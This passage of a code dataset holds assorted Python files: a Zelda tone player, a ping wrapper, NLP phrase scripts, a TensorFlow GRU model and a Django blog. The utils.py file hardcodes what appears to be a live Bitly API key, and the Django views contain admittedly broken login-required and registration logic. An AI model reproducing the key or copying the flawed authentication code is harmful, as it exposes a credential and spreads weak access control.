Question(pub_date=time)\n\t\tself.assertEqual(old_question.was_published_recently(), False)\n\n\tdef test_was_published_with_new_question(self):\n\t\t\"\"\" was_published_recently() should return False for questions\n\t\t\twhose pub_date is older than a day \"\"\"\n\t\ttime = timezone.now() - datetime.timedelta(hours=1)\n\t\tnew_question = Question(pub_date=time)\n\t\tself.assertEqual(new_question.was_published_recently(), True)","sub_path":"polls/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"483068213","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# wmd_launcher.py\n#\n# Copyright 2013 Brandon Knight \n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# * Neither the name of the nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\nimport alsaaudio\nimport sys\nimport time\nfrom math import pi, sin\nfrom numpy import arange # like range, but supports floating point\n\nA = 440\nD = 293.66\nF = 349.23\nC = 523.25\nC4 = 261.63\nC3 = 130.81\nB = 493.88\nD5 = 587.33\nG = 392.00\nD4 = 293.66\nE4 = 329.63\nGab4 = 415.30\nG3 = 196.0\nB2 = 123.47\nB3_flat = 233.08\nA3 = 220.00\nD4l = 311.13\nsong_of_time_notes = [A, A, D, D, D, D, F, F, A, A, D, D, D, D, F, F, A, C, B, B, G, G, F, G, A, A, D, D, C4, E4, D, D, D, D]\n\nclass FrequencyGenerator:\n\tdef __init__(self, channels = 2, sample_size = 1, frame_rate = 44100, period_size = 11025):\n\t\tself.channels = channels\n\t\tself.sample_size = sample_size\n\t\tself.frame_size = self.channels * self.sample_size\n\t\tself.frame_rate = frame_rate\n\t\tself.byte_rate = self.frame_rate * self.frame_size # bytes per second\n\t\tself.period_size = period_size\n\n\t\tself.pcm = alsaaudio.PCM(alsaaudio.PCM_PLAYBACK)\n\t\tself.pcm.setchannels(self.channels)\n\t\tself.pcm.setformat(alsaaudio.PCM_FORMAT_U8)\n\t\tself.pcm.setrate(self.frame_rate)\n\t\tself.pcm.setperiodsize(self.period_size)\n\n\tdef quantize(self, f): # map (-1..1) -> [0..256)\n\t\treturn int((f+1)*127) # depends on PCM format\n\n\tdef sine_wave(self, freq):\n\t\twave = [chr(self.quantize(sin(x))) * self.channels for x in arange(0, 2*pi, 2*pi / (self.frame_rate/freq))]\n\t\twave_data = \"\".join(wave) + \"\".join(wave)\n\t\t(nwaves, extra_bytes) = divmod(self.period_size * self.frame_size, len(wave_data))\n\t\tself.pcm.write((wave_data * nwaves) + wave_data[:extra_bytes])\n\n\tdef play_zelda(self):\n\t\tzelda = [C4, C4, G3, G3, G3, G3, C4, C4, D4, D4l, F, G]\n\t\tfor note in zelda:\n\t\t\tself.sine_wave(note)\n\n\tdef zelda_secret(self):\n\t\tG = 783.99\n\t\tFs = 739.99\n\t\tDs = 622.25\n\t\tGs = 415.30\n\t\tE = 659.26\n\t\tHGs = 830.61\n\t\tHC = 1046.50\n\t\tsecret = [G, Fs, Ds, A, Gs, E, HGs, HC]\n\t\tfor note in secret:\n\t\t\tself.sine_wave(note)\n\ndef main():\n\tt = FrequencyGenerator()\n\tt.zelda_secret()\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"wmd/FrequencyGenerator.py","file_name":"FrequencyGenerator.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"183652529","text":"#!/usr/bin/python3\n# -*- coding: utf8 -*-\n# no_thread_ping_call.py host ...\n\n# NB: it is the SHELL that displays the output lines of the ping command\n# (the python script does not capture the result lines, only the return code)\n\nfrom sys import argv, stdin, stdout, stderr\nfrom subprocess import call, DEVNULL\nfrom os.path import basename\n\nif len(argv[1:]) == 0:\n stderr.write('Usage: ' + basename(argv[0]) + ' host ...\\n')\n exit(1)\n\ndelai = 3 # 3 sec.\n\nfor hote in argv[1:]:\n # run the unix ping command to query hote\n # (option -w stops it after a given delay, otherwise ping \"loops\" forever)\n\n # nb: the return code of the ping command is stored in the variable\n # (i.e. the value of $? in the shell)\n\n retour = call(['/bin/ping', '-w' + str(delai), hote]) # 'ping' command run in a \n # subprocess, in the foreground\n # same as: retour = call('/bin/ping -w' + str(delai) + ' ' + hote, shell=True) \n\n # __ to suppress ping's progress output and its error messages __\n # retour = call(['ping', '-w' + str(delai), hote], stdout=DEVNULL, stderr=DEVNULL) \n # __ __\n\n print('*' * 40) \n if retour == 0: \n print(hote, ': ALIVE')\n elif retour == 1: \n print(hote, ': DOWN ?')\n else:\n print(hote, ': UNKNOWN')\n print('*' * 40)\n","sub_path":"src/Loïc/TP2/sce/no_thread_ping_call.py","file_name":"no_thread_ping_call.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"558348559","text":"import collections\n\n\nclass Solution(object):\n def findOrder(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: List[int]\n \"\"\"\n self.graph = {}\n self.deq = collections.deque()\n self.inDegree = {}\n \n for c in range(numCourses):\n self.graph[c] = set()\n self.inDegree[c] = 0\n \n for c, p in prerequisites:\n self.graph[c].add(p)\n self.inDegree[p] += 1\n \n for c, d in self.inDegree.items():\n if not d:\n self.deq.append(c)\n \n sort = []\n while self.deq:\n c = self.deq.popleft()\n sort.append(c)\n for p in self.graph[c]:\n self.inDegree[p] -= 1\n if not self.inDegree[p]:\n self.deq.append(p)\n \n if len(sort) != numCourses:\n return []\n else:\n sort.reverse()\n return sort\n","sub_path":"210. Course Schedule II/solution-kahns.py","file_name":"solution-kahns.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"565565775","text":"from ToolPack import tools\nfrom datetime import date, timedelta\nfrom nltk.tag import pos_tag\nimport nltk\n\n\ndef phrase_frequencies():\n phrase_path = \"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/Common_Phrases/\"\n\n phrases_dict = dict()\n\n for week_num in range(2, 53):\n most_commons = tools.load_pickle(phrase_path + \"2015-\" + str(week_num) + \"_common_phrases.pickle\")\n for phrase_tuple in most_commons:\n if phrase_tuple[0] in phrases_dict:\n phrases_dict[phrase_tuple[0]] += phrase_tuple[1]\n else:\n phrases_dict[phrase_tuple[0]] = phrase_tuple[1]\n\n for week_num in range(1, 52):\n most_commons = tools.load_pickle(phrase_path + \"2016-\" + str(week_num) + \"_common_phrases.pickle\")\n for phrase_tuple in most_commons:\n if phrase_tuple[0] in phrases_dict:\n phrases_dict[phrase_tuple[0]] += phrase_tuple[1]\n else:\n phrases_dict[phrase_tuple[0]] = phrase_tuple[1]\n\n sorted_by_value = sorted(phrases_dict.items(), key=lambda kv: kv[1])\n sorted_by_value.reverse()\n\n\ndef flat_to_weeks():\n doc_ids_flat = list()\n entity_struct_flat = list()\n start_day = date(2016, 1, 4)\n\n for idx in range(0, 51):\n week_ids_flat = list()\n week_struct_flat = list()\n week_start_day = start_day + timedelta(idx*7)\n current_week = str(week_start_day.isocalendar()[0]) + \"-\" + str(week_start_day.isocalendar()[1])\n for current_date in (week_start_day + timedelta(n) for n in range(7)):\n string_date = str(current_date.year) + \"-\" + str(current_date.month) + \"-\" + \\\n str(current_date.day)\n\n day_ids = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/Pivot_Files/Document_ids/\"\n + current_week + \"/\" + string_date + \"_doc_ids.pickle\")\n day_structs = 
tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/Pivot_Files/\"\n \"Article_Entity_Structure/\" + current_week + \"/\" + string_date\n + \"_DictArticlesList.pickle\")\n week_ids_flat += list(day_ids)\n week_struct_flat += list(day_structs)\n doc_ids_flat.append(week_ids_flat)\n entity_struct_flat.append(week_struct_flat)\n return doc_ids_flat, entity_struct_flat\n\n\ndef number_stop_phrase(phrase):\n is_stop_phrase = False\n\n for word in phrase[0].split():\n if all(char.isdigit() for char in word):\n is_stop_phrase = True\n break\n return is_stop_phrase\n\n\ndef word_stop_phrase(phrase):\n is_stop_phrase = False\n stop_words = {\"year\", \"years\", \"percent\", \"million\", \"millions\", \"billion\",\n \"billions\", \"week\", \"weeks\", \"day\", \"days\"}\n\n for word in phrase[0].split():\n if word in stop_words:\n is_stop_phrase = True\n break\n return is_stop_phrase\n\n\ndef clean_phrases():\n stop_phrases = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/Pivot_Files/\"\n \"stop_phrases.pickle\")\n\n for week_index in range(0, 45):\n print(\"Working on week:\", str(week_index))\n common_phrases = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n \"old/2016-\" + str(week_index + 7) + \"_common_phrases.pickle\")\n cleaned_phrases = list()\n for c_phrase in common_phrases:\n if c_phrase[0] not in stop_phrases:\n if not number_stop_phrase(c_phrase):\n if not word_stop_phrase(c_phrase):\n cleaned_phrases.append(c_phrase)\n tools.save_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n \"Common_Phrases/2016-\" + str(week_index + 7) + \"_common_phrases.pickle\", cleaned_phrases)\n\n\n# Common phrases from the ToPmine algorithm\ndef sentence_common_phrases(list_of_sents, c_phrases):\n all_sent_phrases = list()\n for idx, sentence in enumerate(list_of_sents):\n sent_phrases = list()\n for com_phrase in c_phrases:\n if com_phrase[0] in sentence:\n sent_phrases.append(com_phrase[0])\n all_sent_phrases.append(sent_phrases)\n return all_sent_phrases\n\n\ndef noun_phrases(n_sentence):\n for subtree in n_sentence.subtrees():\n if subtree.label() == 'NP':\n yield ' '.join(word for word, tag in subtree.leaves())\n\n\n# Noun phrases from the idf/parser approach\ndef sentence_noun_phrases(list_of_sents, n_dict):\n all_sent_phrases = list()\n grammar = \"\"\"NP: {
?*+}\n RELATION: {}\n {
?*+}\n ENTITY: {}\"\"\"\n\n for sentence in list_of_sents:\n sent_phrases = list()\n tagged_sent = pos_tag(sentence.split())\n cp = nltk.RegexpParser(grammar)\n parsed_sent = cp.parse(tagged_sent)\n for n_phrase in noun_phrases(parsed_sent):\n if n_phrase in n_dict:\n sent_phrases.append(n_phrase)\n all_sent_phrases.append(sent_phrases)\n\n return all_sent_phrases\n\n\ndef add_phrases_to_struct(t_struct, p_key):\n for idx, p_sent in enumerate(p_key):\n t_struct[idx][\"N\"] = p_sent\n return t_struct\n\n\ndef merge_phrases_to_struct(t_struct, p_key, n_key):\n for idx, (p_sent, n_sent) in enumerate(zip(p_key, n_key)):\n merged_sent = list(set(p_sent + n_sent))\n t_struct[idx][\"N\"] = merged_sent\n return t_struct\n\n# !!!!TODO bug with doc_index = doc_ids[week_index].index(peak_doc) I need to rewrite the add phrases procedure\ndef add_phrase_entities():\n # Noun dictionary\n noun_dict = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/\"\n \"KeyGraph_Approach/Pivot_Files/noun_idf_dict_tt.pickle\")\n # Year\n peak_doc_ids = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/Pivot_Files/\"\n \"ids_of_peaking_docs.pickle\")\n doc_ids, entity_struct = flat_to_weeks()\n new_entity_struct = list()\n peaking_ids = list()\n\n # In peak_doc_ids we have the peaking documents from week 7 until week 51\n for week_index in range(0, 45):\n print(\"Working on week:\" + str(week_index + 7))\n week_sents = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n \"Week_docs_sentences_per_day/2016-\" + str(week_index + 7) + \"sents_of_doc.pickle\")\n common_phrases = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n \"Common_Phrases/2016-\" + str(week_index + 7) + \"_common_phrases.pickle\")\n week_entity_struct = list()\n week_peak_ids = list()\n for peak_doc in peak_doc_ids[week_index]:\n week_peak_ids.append(peak_doc)\n doc_index = doc_ids[week_index].index(peak_doc)\n phrase_key = sentence_common_phrases(week_sents[doc_index], common_phrases)\n noun_key = sentence_noun_phrases(week_sents[doc_index], noun_dict)\n temp_struct = entity_struct[week_index][doc_index]\n # temp_struct = add_phrases_to_struct(temp_struct, phrase_key)\n temp_struct = merge_phrases_to_struct(temp_struct, phrase_key, noun_key)\n week_entity_struct.append(temp_struct)\n peaking_ids.append(week_peak_ids)\n new_entity_struct.append(week_entity_struct)\n\n tools.save_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n \"Pivot_Files/entity_merged_struct.pickle\", new_entity_struct)\n tools.save_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n \"Pivot_Files/week_peak_ids.pickle\", peaking_ids)\n\n\ndef check_nouns():\n noun = tools.load_pickle(\n \"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/Pivot_Files/entity_noun_struct.pickle\")\n phrase = tools.load_pickle(\n \"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/Pivot_Files/entity_phrase_struct.pickle\")\n merged = tools.load_pickle(\n \"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/Pivot_Files/entity_merged_struct.pickle\")\n print()\n flag = True\n while flag:\n num = int(input(\"Give week:\"))\n num2 = int(input(\"Give index\"))\n a_noun = noun[num][num2]\n b_phrase = phrase[num][num2]\n c_merged = merged[num][num2]\n print()\n\n\nif __name__ == \"__main__\":\n # phrase_frequencies()\n add_phrase_entities()\n # clean_phrases()\n # a = 
tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n # \"Pivot_Files/entity_merged_struct.pickle\")\n # b = tools.load_pickle(\"/home/iraklis/PycharmProjects/AllTheNews/KeyGraph_Approach/\"\n # \"Pivot_Files/week_peak_ids.pickle\")\n print()\n\n\n\n\n\n\n\n\n\n\n","sub_path":"KeyGraph_Approach/pivot_functions.py","file_name":"pivot_functions.py","file_ext":"py","file_size_in_byte":9071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"482478848","text":"import tensorflow as tf\nimport tensorflow.keras.layers as tfkl\nfrom tensorflow_probability import distributions as tfd\nfrom tensorflow.keras.mixed_precision import experimental as prec\n\nfrom rrl_praktikum.models.base_module import Module\nfrom rrl_praktikum.utilities import tools\n\n\nclass RecurrentModel(Module):\n def __init__(self, deter=200, hidden=200, act=tf.nn.elu):\n super().__init__()\n self._activation = act\n self._deter_size = deter\n self._hidden_size = hidden\n self._cell = tfkl.GRUCell(self._deter_size)\n\n def initial(self, batch_size):\n dtype = prec.global_policy().compute_dtype\n return dict(\n deter=self._cell.get_initial_state(None, batch_size, dtype))\n\n @tf.function\n def observe(self, embed, action, state=None):\n if state is None:\n state = self.initial(tf.shape(action)[0])\n embed = tf.transpose(embed, [1, 0, 2])\n action = tf.transpose(action, [1, 0, 2])\n post, _ = tools.static_scan(\n lambda prev, inputs: self.obs_step(prev[0], *inputs),\n (action, embed), (state, state))\n post = {k: tf.transpose(v, [1, 0, 2]) for k, v in post.items()}\n return post, None\n\n @tf.function\n def imagine(self, action, state=None):\n if state is None:\n state = self.initial(tf.shape(action)[0])\n assert isinstance(state, dict), state\n action = tf.transpose(action, [1, 0, 2])\n prior = tools.static_scan(self.img_step, action, state)\n prior = {k: tf.transpose(v, [1, 0, 2]) for k, v in prior.items()}\n return prior\n\n def get_feat(self, state):\n return state['deter']\n\n @tf.function\n def obs_step(self, prev_state, prev_action, embed):\n x = tf.concat([prev_action, embed], -1)\n x = self.get('obs1', tfkl.Dense, self._hidden_size, self._activation)(x)\n x, deter = self._cell(x, [prev_state['deter']])\n deter = deter[0] # Keras wraps the state in a list.\n state = {'deter': deter}\n return state, state\n\n @tf.function\n def img_step(self, prev_state, prev_action):\n x = prev_action\n x = self.get('img1', tfkl.Dense, self._hidden_size, self._activation)(x)\n x, deter = self._cell(x, [prev_state['deter']])\n deter = deter[0] # Keras wraps the state in a list.\n state = {'deter': deter}\n return state\n","sub_path":"rrl_praktikum/models/recurrent_model.py","file_name":"recurrent_model.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"349330957","text":"import htmllib\nimport bitly_api\n\ndef unescape(s):\n p = htmllib.HTMLParser(None)\n p.save_bgn()\n p.feed(s)\n return p.save_end()\n\ndef rainbowify(s,shift=2):\n return ''.join(map(lambda x: chr(3) + str(x[0]+shift) + ',' + str(x[0]) + x[1], enumerate(s)))\n \nbitly = bitly_api.Connection(\n 'voxinfinitus', \n 'R_d3664470e5404623b5c0e3a25a873286', \n )\n\n","sub_path":"voxbot/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"518484669","text":"#-*- coding:utf-8 
-*-\n\n__author__ = 'wangjf'\n\n\ndef sum1(L):\n if not L:\n return None\n first, *arg = L\n return first if not arg else first + sum1(arg)\n\nL = [1,2,3,4,5]\nprint(sum1(L))\nprint(sum1([]))","sub_path":"Learn_python/chapter19/19.1_sum.py","file_name":"19.1_sum.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"71766051","text":"import numpy as np\nimport cv2\nfrom numpy.linalg import norm # scipy.spatial.distance has no norm(); numpy.linalg.norm supports norm(vec, 2)\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\n\n\ndef norm1d(vec):\n\n\tnormalizer = norm(vec, 2)\n\tif normalizer > 0:\n\t\treturn vec/normalizer\n\telse:\n\t\treturn np.zeros_like(vec)\n\n\n\ndef compute_hog(cont,cube_size,block_size,bins,gradient_par=False):\n\t\"\"\"\n\tExtract words from a given video chunk\n\n\tParameters\n\t----------\n\tcont: sub-part of a video, or gradient images.\n\tcube_size : (cube_t, cube_h, cube_w) dimensions of a cube\n\tblock_size : (block_t, block_h, block_w) number of cubes per block\n\tbins : number of hog orientations\n\tgradient_par = True : gradients are provided\n\t\t\t\t\tFalse: the original video is provided\n\t\"\"\"\n\tchnk_angle = None\n\tchnk_mag = None\n\tgrad_x = None\n\tgrad_y = None\n\tcube_t,cube_h,cube_w = cube_size\n\tblock_t,block_h,block_w = block_size\n\n\tif gradient_par is True:\n\t\tgrad_x,grad_y = (cont[...,0],cont[...,1])\n\telse:\n\t\tgrad_x,grad_y = compute_gradients(cont)\n\n\n\tT,H,W = grad_x.shape\n\n\t#Compute quantized gradient directions, and their magnitudes\n\tfor i in range(T):\n\t\tg_x = grad_x[i]\n\t\tg_y = grad_y[i]\n\t\tif chnk_angle is None:\n\t\t\tchnk_angle = np.arctan2(g_y, g_x)[None,:,:]\n\t\t\tchnk_mag = np.sqrt(g_y**2 + g_x**2)[None,:,:]\n\t\telse:\n\t\t\tchnk_angle = np.concatenate((chnk_angle, np.arctan2(g_y, g_x)[None,:,:]),axis=0)\n\t\t\tchnk_mag = np.concatenate((chnk_mag, np.sqrt(g_y**2 + g_x**2)[None,:,:]),axis=0)\n\n\tchnk_angle = np.where(chnk_angle <= 0, chnk_angle + np.pi, chnk_angle)\n\tpiconst = bins/np.pi\n\tchnk_angle = np.ceil(piconst * chnk_angle)\n\n\t#Compute integral histogram, FIRST INDICES ARE ALWAYS ZERO\n\t#A cube shell of zero values around the integral histogram is needed to calculate it right [it's probable that I am wrong]\n\tintegral_histogram = np.zeros((chnk_angle.shape[0]+2, chnk_angle.shape[1]+2,chnk_angle.shape[2]+2, bins))\n\tfor i in range(bins):\n\n\t\tintegral_histogram[1:-1,1:-1,1:-1,i] = np.where(chnk_angle==i+1, chnk_mag, 0)\n\t\tintegral_histogram[...,i] = np.cumsum(np.cumsum(np.cumsum(integral_histogram[...,i],axis=0),axis=1),axis=2)\n\n\tchnk_cells = []\n\t#----------------------------------\n\tA = integral_histogram[1:-cube_t , cube_h+1:, 1:-cube_w ,: ]\n\tB = integral_histogram[1:-cube_t , cube_h+1:, cube_w+1: ,:]\n\tC = integral_histogram[ cube_t+1:, cube_h+1:, 1:-cube_w,: ]\n\tD = integral_histogram[ cube_t+1:, cube_h+1:, cube_w+1:,: ]\n\n\tcube_histogram = A + D - C - B\n\tcube_hist_t , cube_hist_h , cube_hist_w = grad_x.shape\n\n\n\tstep_t = cube_t*block_t\n\tstep_h = cube_h*block_h\n\tstep_w = cube_w*block_w\n\n\t# integer division (//) so the range() calls below receive ints under Python 3\n\trange_t = step_t*(cube_hist_t//step_t)\n\trange_h = step_h*(cube_hist_h//step_h)\n\trange_w = step_w*(cube_hist_w//step_w)\n\n\n\n\tcube_histogram_mesh = [np.mgrid[#Generate the local grid of cubes histogram\n\t\t\t\t\t\t\t\tt : t+step_t : cube_t,\n\t\t\t\t\t\t\t\tx : x+step_h : cube_h,\n\t\t\t\t\t\t\t\ty : y+step_w : cube_w,\n\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\tfor t in range(0,range_t,step_t)#define the starting points of each\n\t\t\t\t\t\tfor x in 
range(0,range_h,step_h)#block that contains cubes histograms\n\t\t\t\t\t\tfor y in range(0,range_w,step_w)#values, CRITICAL but NEEDED\n\n\t\t\t\t\t\t]\n\n\tblock_cubes_hog = np.asarray([cube_histogram[grid[0],grid[1],grid[2],:] for grid in cube_histogram_mesh])\n\tblock_cubes_hog = block_cubes_hog.reshape(block_cubes_hog.shape[0],-1)\n\tblock_cubes_hog = np.apply_along_axis(norm1d,1,block_cubes_hog)\n\treturn block_cubes_hog\n\n\n\n\ndef compute_gradients(v_chnk):\n\tgrad = [np.gradient(v_chnk[i,...]) for i in range(v_chnk.shape[0])]\n\tgrad_x,grad_y = zip(*grad)\n\treturn np.asarray(grad_x) , np.asarray(grad_y)\n\n\ndef main():\n\tcell = np.random.randint(10,size=(32,32,32))\n\tcompute_hog(cell,[8,8,8], [2,2,2],8,False)\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n","sub_path":"MyCode/features/Temporal_features.py","file_name":"Temporal_features.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"570708992","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.views.generic import View, ListView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import FormView\nfrom django.views.generic.base import TemplateView, TemplateResponseMixin, ContextMixin\nfrom artigos.models import Artigo\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.models import User\nfrom artigos.forms import *\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\n\n\n#django class hierarchy:\n#View - the parent class of all the other view classes\n#TemplateView - class whose main building blocks are: ContextMixin, TemplateResponseMixin, View\n\n#example of a function based view\n#def ola(request):\n# return render(request, 'index.html')\n\n#class for login_required - it is not working\nclass LoginRequiredMixin(object):\n\n @classmethod\n def as_view(cls, **kwargs):\n view = super(LoginRequiredMixin, cls).as_view(**kwargs)\n return login_required(view)\n\n#ContextMixin, TemplateResponseMixin,View\nclass Principal(TemplateView):\n template_name = \"index.html\"\n form_class = FormPesquisa\n\n #passing a context to the main page for TemplateView\n #def get_context_data(self, *args, **kwargs):\n # context = super(Principal, self).get_context_data(**kwargs)\n # context['title'] = \"About us\"\n # return context\n\n #to use render_to_response we have to inherit this method from ContextMixin and TemplateResponseMixin\n # def get(self, request, *args, **kwargs):\n # context = self.get_context_data(**kwargs)\n # context['usuario'] = request.user\n # return self.render_to_response(context)\n\n #TemplateView, View\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name, {'form':self.form_class})\n\n def post(self,request, *args, **kwargs):\n form = self.form_class(request.POST)\n if form.is_valid():\n q = form.cleaned_data['lupa']\n resultado = Artigo.objects.filter(titulo__contains=q)\n return render(request, self.template_name, {'form':self.form_class, 'artigo':resultado})\n\n#example of a class based view\n#pulled out of ListView so that we can pass the user\nclass Posts(LoginRequiredMixin, ListView):\n template_name='posts.html'\n context_object_name = 'artigos'\n paginate_by = 3\n\n def get_queryset(self):\n return Artigo.objects.all()\n\nclass MenuFiltroPosts(LoginRequiredMixin, ListView):\n template_name='posts.html'\n context_object_name = 'artigos'\n paginate_by = 2\n\n #example of how to get the slug field from the urls\n # def get(self, request, *args, **kwargs):\n # artigo = Artigo.objects.filter(titulo__contains= kwargs['slug'])\n # paginator = Paginator(artigo, 1)\n # page = request.GET.get('page')\n # artigo = paginator.get_page(page)\n # return render(request, self.template_name, {'artigos':artigo})\n\n def get_queryset(self):\n slug = self.kwargs['slug']\n return Artigo.objects.filter(titulo__contains=slug)\n\n\nclass Contato(LoginRequiredMixin, FormView, TemplateView):\n template_name = \"contato.html\"\n form_class = FormContato\n success_url = 'http://programblog.life'\n\n def form_valid(self, form):\n return super(Contato, self).form_valid(form)\n \n\n def post(self, request, *args, **kwargs):\n pass\n\n #def get(self, request, *args, **kwargs):\n #return render(request, self.template_name)\n\n#previously used as a DetailView\nclass ArtigoDetalhes(LoginRequiredMixin, TemplateView):\n model = Artigo\n #slug_field = 'pk'\n #context_object_name = 'artigo'\n template_name = 'detail.html'\n\n # def get_context_data(self,**kwargs):\n # context = super(ArtigoDetalhes,self).get_context_data(**kwargs)\n # return context\n\n def get(self, request, *args, **kwargs):\n consulta = Artigo.objects.get(id = kwargs['pk'])\n return render(request, self.template_name, {'artigo':consulta})\n\nclass Login(FormView):\n template_name = \"login.html\"\n form_class = Formlogin\n success_url = 'http://programblog.life'\n\n def form_valid(self, form):\n return super(Login, self).form_valid(form)\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST)\n flag_nao_autorizado = False\n # estado = \"vazio\"\n if form.is_valid():\n usuario = form.cleaned_data['usuario']\n senha = form.cleaned_data['senha']\n user = authenticate(username=usuario, password=senha)\n if user is not None:\n if user.is_active:\n if user.is_staff:\n login(request, user)\n return redirect('http://programblog.life/')\n else:\n flag_nao_autorizado = True\n else:\n flag_nao_autorizado = True\n else:\n flag_nao_autorizado = True\n\n return render(request, self.template_name, {'form':self.form_class, 'nao_permitido':flag_nao_autorizado})\n\n# class Procurar(FormView):\n# template_name = 'index.html'\n# form_class = FormPesquisa\n# success_url = 'http://127.0.0.1:8000/pesquisa'\n#\n# def form_valid(self, form):\n# email = form.cleaned_data['email']\n# return super(Procurar, self).form_valid(form)\n#\n# def post(self, request, *args, **kwargs):\n# pass\n\n\nclass Logout(TemplateView):\n template_name = 'logout.html'\n\n def get(self, request, *args, **kwargs):\n logout(request)\n return render(request, self.template_name)\n\nclass Cadastro(FormView):\n template_name = \"cadastro.html\"\n form_class = FormCadastro\n success_url = 'http://programblog.life'\n\n def form_valid(self, form):\n return super(Cadastro, self).form_valid(form)\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(request.POST)\n if form.is_valid():\n usuario = form.cleaned_data['usuario']\n email = form.cleaned_data['email']\n senha1 = form.cleaned_data['senha1']\n senha2 = form.cleaned_data['senha2']\n if (senha1 == senha2):\n valida = True\n else:\n valida = False\n\n if (valida):\n try:\n user = User.objects.create_user(usuario, email, senha1)\n user.is_staff = False\n user.save()\n login(request, user)\n except Exception as err:\n erro = err\n\n return redirect('http://programblog.life')\n else:\n erro = \"Invalid password\"\n\n return render(request, self.template_name, {'form':self.form_class, 'erro':erro})","sub_path":"artigos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"46866965","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('generators', '0004_generator_user'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='generator',\n name='created_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 6, 12, 16, 2, 44, 649847, tzinfo=utc), verbose_name=b'date created'),\n ),\n migrations.AddField(\n 